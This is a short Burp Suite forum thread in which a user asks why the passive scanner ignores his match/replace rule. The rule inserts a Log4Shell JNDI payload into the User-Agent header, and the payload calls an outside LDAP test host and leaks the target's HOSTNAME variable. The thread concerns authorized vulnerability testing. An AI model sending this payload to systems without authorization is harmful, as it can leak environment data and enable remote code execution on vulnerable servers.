Burp Suite User Forum

Create new post

Scanner does not honor match/replace rules

Lieven | Last updated: Dec 22, 2021 07:41PM UTC

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when browsing but "Passively scan this host" doesn't apply the rule. Is that a simple setting I overlooked? Regards, Lieven

Uthman, PortSwigger Agent | Last updated: Dec 23, 2021 07:03AM UTC

Lieven | Last updated: Dec 23, 2021 08:09PM UTC

Ah, thank you. Good to know.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.